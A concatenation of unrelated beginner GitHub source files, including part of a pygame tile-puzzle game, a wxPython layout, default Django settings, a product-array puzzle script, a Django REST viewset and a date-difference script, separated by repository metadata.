if c==0 and d==152 and g==152 and h==152:
g=0
c=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T3
if len(L)==2 and L[0]==([152,302,152,302]) and L[1]==([152,152,302]):
print("X")
if c==152 and d==152 and g==0 and h==152:
c=0
g=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T4
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,302,152,302]):
print("X")
if c==152 and d==0 and g==152 and h==152:
d=152
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([152,302,152,302]):
print("X")
if c==152 and d==152 and g==152 and h==0:
d=0
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T1
if len(L)==2 and L[1]==([150,0,150]) and L[0]==([152,302,152,302]):
print("X")
if c==152 and d==152 and a==0 and b==0:
c=0
d=0
a=152
b=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T4
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([152,302,152,302]):
print("X")
if a==152 and b==152 and c==0 and d==0:
a=0
b=0
c=152
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,152,302]):
print("X")
if c==152 and d==152 and e==0 and f==152:
c=0
e=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T4
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,302,152,302]):
print("X")
if c==0 and d==152 and e==152 and f==152:
e=0
c=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
# *******************************************************Third*****************************************************************************
#T3->T1
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([150,0,150]):
print("X")
if a==0 and b==0 and e==0 and f==152:
b=152
f=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([150,0,150]):
print("X")
if a==0 and b==152 and e==0 and f==0:
b=0
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([150,0,150]):
print("X")
if e==0 and f==0 and c==152 and d==0:
e=152
c=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T1
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([150,0,150]):
print("X")
if e==152 and f==0 and c==0 and d==0:
e=0
c=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T4
if len(L)==2 and L[1]==([152,302,152,302]) and L[0]==([150,0,150]):
print("X")
if g==152 and h==152 and e==0 and f==0:
g=0
h=0
e=152
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T1
if len(L)==2 and L[0]==([152,302,152,302]) and L[1]==([150,0,150]):
print("X")
if e==152 and f==152 and g==0 and h==0:
e=0
f=0
g=152
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T2
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,302,150]):
print("X")
if c==152 and d==0 and e==0 and f==152:
c=0
d=152
e=152
f=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,150]):
print("X")
if c==0 and d==152 and e==152 and f==0:
c=152
d=0
e=0
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T1
if len(L)==2 and L[1]==([152,0,150]) and L[0]==([152,302,150]):
print("X")
if a==0 and b==0 and e==152 and f==0:
a=152
e=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T2
if len(L)==2 and L[0]==([152,0,150]) and L[1]==([152,302,150]):
print("X")
if a==152 and b==0 and e==0 and f==0:
a=0
e=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T4
if len(L)==2 and L[1]==([152,302,152,302]) and L[0]==([152,302,150]):
print("X")
if e==152 and f==0 and g==152 and h==152:
f=152
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T2
if len(L)==2 and L[0]==([152,302,152,302]) and L[1]==([152,302,150]):
print("X")
if e==152 and f==152 and g==152 and h==0:
f=0
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T4
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,302,152,302]):
print("X")
if e==0 and f==152 and g==152 and h==152:
e=152
g=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,152,302]):
print("X")
if e==152 and f==152 and g==0 and h==152:
e=0
g=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T1
if len(L)==2 and L[1]==([150,0,150]) and L[0]==([152,302,152,302]):
print("X")
if e==152 and f==152 and a==0 and b==0:
e=0
f=0
a=152
b=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T4
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([152,302,152,302]):
print("X")
if a==152 and b==152 and e==0 and f==0:
a=0
b=0
e=152
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([152,302,152,302]):
print("X")
if e==152 and f==152 and c==152 and d==0:
f=0
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T4
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,302,152,302]):
print("X")
if e==152 and f==0 and c==152 and d==152:
f=152
d=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
# **************************************************************Fourth************************************************************************
#T4->T1
if len(L)==2 and L[0]==([152,302,152,302]) and L[1]==([150,0,150]):
print("X")
if a==0 and b==0 and g==152 and h==152:
a=152
b=152
g=0
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T4
if len(L)==2 and L[1]==([152,302,152,302]) and L[0]==([150,0,150]):
print("X")
if a==152 and b==152 and g==0 and h==0:
a=0
b=0
g=152
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([150,0,150]):
print("X")
if c==152 and d==0 and g==0 and h==0:
c=0
g=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T1
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([150,0,150]):
print("X")
if c==0 and d==0 and g==152 and h==0:
c=152
g=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([150,0,150]):
print("X")
if e==0 and f==152 and g==0 and h==0:
f=0
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T1
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([150,0,150]):
print("X")
if e==0 and f==0 and g==0 and h==152:
f=152
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T2
if len(L)==2 and L[0]==([152,302,152,302]) and L[1]==([152,302,150]):
print("X")
if c==152 and d==0 and g==152 and h==152:
h=0
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T4
if len(L)==2 and L[1]==([152,302,152,302]) and L[0]==([152,302,150]):
print("X")
if c==152 and d==152 and g==152 and h==0:
d=0
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T1
if len(L)==2 and L[1]==([150,0,150]) and L[0]==([152,302,150]):
print("X")
if a==0 and b==0 and g==152 and h==0:
g=0
a=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T2
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([152,302,150]):
print("X")
if a==152 and b==0 and g==0 and h==0:
a=0
g=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,150]):
print("X")
if e==0 and f==152 and g==152 and h==0:
e=152
f=0
g=0
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T2
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,302,150]):
print("X")
if e==152 and f==0 and g==0 and h==152:
e=0
f=152
g=152
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,152,302]):
print("X")
if e==0 and f==152 and g==152 and h==152:
e=152
g=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T4
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,302,152,302]):
print("X")
if e==152 and f==152 and g==0 and h==152:
e=0
g=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T1
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([150,0,150]):
print("X")
if a==0 and b==0 and g==0 and h==152:
h=0
b=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([150,0,150]):
print("X")
if a==0 and b==152 and g==0 and h==0:
b=0
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T2
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,302,150]):
print("X")
if c==152 and d==0 and g==0 and h==152:
c=0
d=152
g=152
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,150]):
print("X")
if c==0 and d==152 and g==152 and h==0:
g=0
h=152
c=152
d=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
# **********************************************************************************************************************************************
#T1->T1
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([150,0,150]):
L.remove(L[0])
#T2->T2
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,302,150]):
L.remove(L[0])
#T3->T3
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,152,302]):
L.remove(L[0])
#T4->T4
if len(L)==2 and L[0]==([152,302,152,302]) and L[1]==([152,302,152,302]):
L.remove(L[0])
if len(m)==2 and g==0 and h==0 and e==152 and f==0 and c==0 and d==152 and a==152 and b==152:
print("")
if event.type==p.QUIT:
done=True
if 2<=len(m)<=5:
r=Tk()
r.title("Score")
label=Label(r,text="Your Score is 100")
label.grid(row=0,columnspan=8)
r.mainloop
Win(X)
if 6<=len(m)<=10:
r=Tk()
r.title("Score")
label=Label(r,text="Your Score is 50")
label.grid(row=0,columnspan=8)
r.mainloop
Win(X)
if 11<=len(m)<=15:
r=Tk()
r.title("Score")
label=Label(r,text="Your Score is 20")
label.grid(row=0,columnspan=8)
r.mainloop
Win(X)
if len(m)>15:
Lose(X)
p.display.update()
p.quit()
|
[
"noreply@github.com"
] |
Ameema-Arif.noreply@github.com
|
7c4dd661b10e6f4a17ea31043784a8eb8c483fd2
|
28658c31d79c99f0e0b02231b4d33eef30e8794c
|
/layout2.py
|
136f80909c0ba18ab427b18a51f46ffe31a4b9df
|
[] |
no_license
|
gamesun/learn-wxpython
|
8202b1927b6acd3da9efb5317a1a4b688d92ffda
|
0b571e117f4f0b36e388923c59e83fb625a07306
|
refs/heads/master
| 2021-01-18T19:29:20.053939
| 2014-04-19T03:37:31
| 2014-04-19T03:37:31
| 10,583,441
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,079
|
py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# generated by wxGlade 0.6.7 (standalone edition) on Thu Jun 20 20:41:34 2013
#
import wx
# begin wxGlade: dependencies
import gettext
# end wxGlade
# begin wxGlade: extracode
# end wxGlade
class myFrame(wx.Frame):
def __init__(self, *args, **kwds):
# begin wxGlade: myFrame.__init__
kwds["style"] = wx.DEFAULT_FRAME_STYLE
wx.Frame.__init__(self, *args, **kwds)
self.mainframe_statusbar = self.CreateStatusBar(1, wx.ST_SIZEGRIP)
self.pnlmain = wx.ScrolledWindow(self, wx.ID_ANY, style=wx.TAB_TRAVERSAL)
self.window_1 = wx.SplitterWindow(self.pnlmain, wx.ID_ANY, style=wx.SP_3DBORDER | wx.SP_BORDER)
self.window_1_pane_1 = wx.ScrolledWindow(self.window_1, wx.ID_ANY, style=wx.STATIC_BORDER | wx.TAB_TRAVERSAL)
self.label1 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label1"))
self.label2 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label2"))
self.label3 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label3"))
self.label4 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label4"))
self.label5 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label5"))
self.label6 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label6"))
self.label7 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label7"))
self.label8 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label8"))
self.label9 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label9"))
self.label10 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label10"))
self.label11 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label11"))
self.label12 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label12"))
self.label13 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label13"))
self.label14 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label14"))
self.label15 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label15"))
self.label16 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label16"))
self.label17 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label17"))
self.label18 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label18"))
self.label19 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label19"))
self.label20 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label20"))
self.label21 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label21"))
self.label22 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label22"))
self.label23 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label24"))
self.label24 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label24"))
self.label25 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label25"))
self.label26 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label26"))
self.label27 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label27"))
self.label28 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label28"))
self.label29 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label29"))
self.label30 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label30"))
self.label31 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label31"))
self.label32 = wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _("label32"))
self.window_1_pane_2 = wx.ScrolledWindow(self.window_1, wx.ID_ANY, style=wx.STATIC_BORDER | wx.TAB_TRAVERSAL)
self.__set_properties()
self.__do_layout()
# end wxGlade
def __set_properties(self):
# begin wxGlade: myFrame.__set_properties
self.SetTitle(_("Tool"))
self.mainframe_statusbar.SetStatusWidths([-1])
# statusbar fields
mainframe_statusbar_fields = [_("mainframe_statusbar")]
for i in range(len(mainframe_statusbar_fields)):
self.mainframe_statusbar.SetStatusText(mainframe_statusbar_fields[i], i)
self.window_1_pane_1.SetScrollRate(1, 14)
self.window_1_pane_2.SetScrollRate(1, 1)
self.pnlmain.SetMinSize((850, 520))
self.pnlmain.SetScrollRate(1, 1)
# end wxGlade
def __do_layout(self):
# begin wxGlade: myFrame.__do_layout
sizer1 = wx.BoxSizer(wx.HORIZONTAL)
sizer_1 = wx.BoxSizer(wx.HORIZONTAL)
sizertitle = wx.BoxSizer(wx.VERTICAL)
sizertitle.Add(self.label1, 100, wx.EXPAND, 0)
sizertitle.Add(self.label2, 100, wx.EXPAND, 0)
sizertitle.Add(self.label3, 100, wx.EXPAND, 0)
sizertitle.Add(self.label4, 100, wx.EXPAND, 0)
sizertitle.Add(self.label5, 100, wx.EXPAND, 0)
sizertitle.Add(self.label6, 100, wx.EXPAND, 0)
sizertitle.Add(self.label7, 100, wx.EXPAND, 0)
sizertitle.Add(self.label8, 100, wx.EXPAND, 0)
sizertitle.Add(self.label9, 100, wx.EXPAND, 0)
sizertitle.Add(self.label10, 100, wx.EXPAND, 0)
sizertitle.Add(self.label11, 100, wx.EXPAND, 0)
sizertitle.Add(self.label12, 100, wx.EXPAND, 0)
sizertitle.Add(self.label13, 100, wx.EXPAND, 0)
sizertitle.Add(self.label14, 100, wx.EXPAND, 0)
sizertitle.Add(self.label15, 100, wx.EXPAND, 0)
sizertitle.Add(self.label16, 100, wx.EXPAND, 0)
sizertitle.Add(self.label17, 100, wx.EXPAND, 0)
sizertitle.Add(self.label18, 100, wx.EXPAND, 0)
sizertitle.Add(self.label19, 100, wx.EXPAND, 0)
sizertitle.Add(self.label20, 100, wx.EXPAND, 0)
sizertitle.Add(self.label21, 100, wx.EXPAND, 0)
sizertitle.Add(self.label22, 100, wx.EXPAND, 0)
sizertitle.Add(self.label23, 100, wx.EXPAND, 0)
sizertitle.Add(self.label24, 100, wx.EXPAND, 0)
sizertitle.Add(self.label25, 100, wx.EXPAND, 0)
sizertitle.Add(self.label26, 100, wx.EXPAND, 0)
sizertitle.Add(self.label27, 100, wx.EXPAND, 0)
sizertitle.Add(self.label28, 100, wx.EXPAND, 0)
sizertitle.Add(self.label29, 100, wx.EXPAND, 0)
sizertitle.Add(self.label30, 100, wx.EXPAND, 0)
sizertitle.Add(self.label31, 100, wx.EXPAND, 0)
sizertitle.Add(self.label32, 100, wx.EXPAND, 0)
self.window_1_pane_1.SetSizer(sizertitle)
self.window_1.SplitVertically(self.window_1_pane_1, self.window_1_pane_2, 80)
sizer_1.Add(self.window_1, 1, wx.EXPAND, 0)
self.pnlmain.SetSizer(sizer_1)
sizer1.Add(self.pnlmain, 1, wx.EXPAND, 0)
self.SetSizer(sizer1)
sizer1.Fit(self)
self.Layout()
self.Centre()
# end wxGlade
# end of class myFrame
class MyApp(wx.App):
def OnInit(self):
wx.InitAllImageHandlers()
mainframe = myFrame(None, wx.ID_ANY, "")
self.SetTopWindow(mainframe)
mainframe.Show()
return 1
# end of class MyApp
if __name__ == "__main__":
gettext.install("app") # replace with the appropriate catalog name
app = MyApp(0)
app.MainLoop()
|
[
"gamesunyt@gmail.com"
] |
gamesunyt@gmail.com
|
5be0d964b412b379fa23c40b1fa4dea76522cac5
|
a316314363af3de6063b37dc793505124474eb64
|
/mysite/settings.py
|
6d66323962cce74f9e7e32bdc3a31738204bd5b2
|
[] |
no_license
|
arya626/Change-Detection-with-Siamese-CNN
|
2cb920aef46286ce98ff5251ad03ed3e513f07fb
|
3f75180047fb4eb75a9ad7bd21943ac7094c08c8
|
refs/heads/master
| 2022-11-20T19:06:27.087445
| 2020-06-06T13:00:32
| 2020-06-06T13:00:32
| 280,451,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,449
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.0.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '1#3e0g5ffn$z(30rf*l73&5k5#$tf=n0!+_oif*z!br)k^p$%+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'changedetection.apps.ChangedetectionConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'crispy_forms',
'pagedown',
'imagekit',
]
CRISPY_TEMPLATE_PACK = "bootstrap4"
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR,'template')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
'/mysite/static/'
]
STATIC_ROOT = "mysite/static/"
MEDIA_ROOT = os.path.join(BASE_DIR,'media')
MEDIA_URL = '/media/'
|
[
"bharathi.purple@gmail.com"
] |
bharathi.purple@gmail.com
|
6111fd1f730be1ccf96eeecee0d08b28d83d03d1
|
77bda097e678ffd54fa8d2989854ae2c763d7d45
|
/weather/settings.py
|
c50da972575ebf1b29aca283a610cfecb533a4a5
|
[] |
no_license
|
brendanm9t/weather-app-django
|
dd6d33967a497ba7e93c150aeee7713d0e7624ba
|
92afbde2c9dfe41cd1f3451bfaf1c8c296c07a2d
|
refs/heads/master
| 2022-09-27T00:03:18.987684
| 2020-06-02T20:15:16
| 2020-06-02T20:15:16
| 268,760,833
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,133
|
py
|
"""
Django settings for weather project.
Generated by 'django-admin startproject' using Django 3.0.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '__u%kikxc5g6pz_(1qt$ryf4d1dsulswm^!09mxq4q-1_-1o!='
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'lookup', # App to search for weather
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'weather.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'weather.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"brendanmitton@gmail.com"
] |
brendanmitton@gmail.com
|
b5604de8e95d981772a8a08167d2fd6c8e1c49a3
|
9c3b9bacc2620bf317474391d296a97b245afad8
|
/daily coding problem/Uber/A Product Array Puzzle O(n) O(1).py
|
d29b4c114b723cb0eabfafe4cd443b4098869898
|
[] |
no_license
|
rishavghosh605/Competitive-Coding
|
72dd4f7f6aef45e06ac85d35fa1c79bf0d7701e2
|
0e94036004efe5d9e8a95909f22f3406f86da4e9
|
refs/heads/master
| 2020-05-30T15:32:41.628390
| 2020-04-06T15:40:04
| 2020-04-06T15:40:04
| 189,821,890
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 828
|
py
|
# Python program for product array puzzle
# with O(n) time and O(1) space.
'''Use property of log to multiply large numbers
x = a * b * c * d
log(x) = log(a * b * c * d)
log(x) = log(a) + log(b) + log(c) + log(d)
x = antilog(log(a) + log(b) + log(c) + log(d))'''
import math
# epsilon value to maintain precision
EPS = 1e-9
def productPuzzle(a, n):
# to hold sum of all values
sum = 0
for i in range(n):
sum += math.log10(a[i])
# output product for each index
# antilog to find original product value
for i in range(n):
print int((EPS + pow(10.00, sum - math.log10(a[i])))),
return
# Driver code
a = [10, 3, 5, 6, 2 ]
n = len(a)
print "The product array is: "
productPuzzle(a, n)
'''
Output:
The product array is:
180 600 360 300 900
Time complexity : O(n)
Space complexity: O(1)
'''
|
[
"rishavghosh605@gmail.com"
] |
rishavghosh605@gmail.com
|
9f707ef234d32d134b9d40544fee0180dce546df
|
2ba1517b2537b499f548425f034548c089d49b26
|
/watson/filters/__init__.py
|
a729d5e8cd34ff755ebeda84f6373a5cb7fd5aef
|
[
"BSD-2-Clause"
] |
permissive
|
watsonpy/watson-filters
|
fa1ab2fe1ba8544bf6af56f828100d61b3bc93eb
|
22e3473d4caa3a5b208eeecd6d810f58f2d3a834
|
refs/heads/master
| 2020-12-22T23:24:04.731258
| 2019-10-03T04:28:39
| 2019-10-03T04:28:39
| 16,093,769
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 462
|
py
|
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
try:
# Fix for setup.py version import
from watson.filters.string import (Trim, Upper, Lower, RegEx, Numbers,
StripTags, HtmlEntities, Date)
__all__ = [
'Trim',
'Upper',
'Lower',
'RegEx',
'Numbers',
'StripTags',
'HtmlEntities',
'Date']
except: # noqa, pragma: no cover
pass # pragma: no cover
|
[
"simon.coulton@gmail.com"
] |
simon.coulton@gmail.com
|
e3cefd33af2af14d595f20c65c947b154e491548
|
7d0868ffa683803b55dd525beaad0ecc1ae40dcc
|
/backend/todo/views.py
|
a8c90ab361f4674b961af09b1ba9bcecb97e9be3
|
[] |
no_license
|
chelsejw/todo
|
7427ab4d212d9167aacbf32794350a82c5613f9a
|
b856aa2fe3654c6ba879b0d4d80c2a7dac655548
|
refs/heads/master
| 2023-01-18T16:10:33.169181
| 2020-12-04T09:02:56
| 2020-12-04T09:02:56
| 299,287,749
| 0
| 0
| null | 2020-10-01T13:35:47
| 2020-09-28T11:32:30
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 368
|
py
|
from django.shortcuts import render
# Create your views here.
from rest_framework.permissions import AllowAny
from rest_framework.viewsets import ModelViewSet
from .models import Item
from .serializers import ItemSerializer
class ItemViewSet(ModelViewSet):
queryset = Item.objects.all()
serializer_class = ItemSerializer
permission_classes = [AllowAny]
|
[
"chelsejw@gmail.com"
] |
chelsejw@gmail.com
|
13ee98f47946a5208c92ef8471cee9c16fb70363
|
dd8c2b417ea6ad2360cf1a21a7eeb99b7b7ca459
|
/Week 5/Day 3/XP/modulesXP.py
|
83a413e5776033a07b2ab6aa2deeb88129de2f6e
|
[] |
no_license
|
nsal-ai/DI_Bootcamp
|
028d6eb342294bd0ce5bc159b1f39b4d5880c981
|
6331f895237b6b51b8dbf291d15e34ccaaad72ba
|
refs/heads/main
| 2023-05-22T13:34:07.568245
| 2021-06-11T16:02:32
| 2021-06-11T16:02:32
| 354,993,432
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,787
|
py
|
# import datetime as dt
# date1 = dt.datetime.today()
# print(date1)
import time, datetime
today_date = datetime.date.today()
future_date = datetime.date(2022,1,1)
diff = future_date - today_date
print(diff.days)
import datetime, time
ny_22 = datetime.date(2022, 1, 1) - datetime.date.today()
print(ny_22)
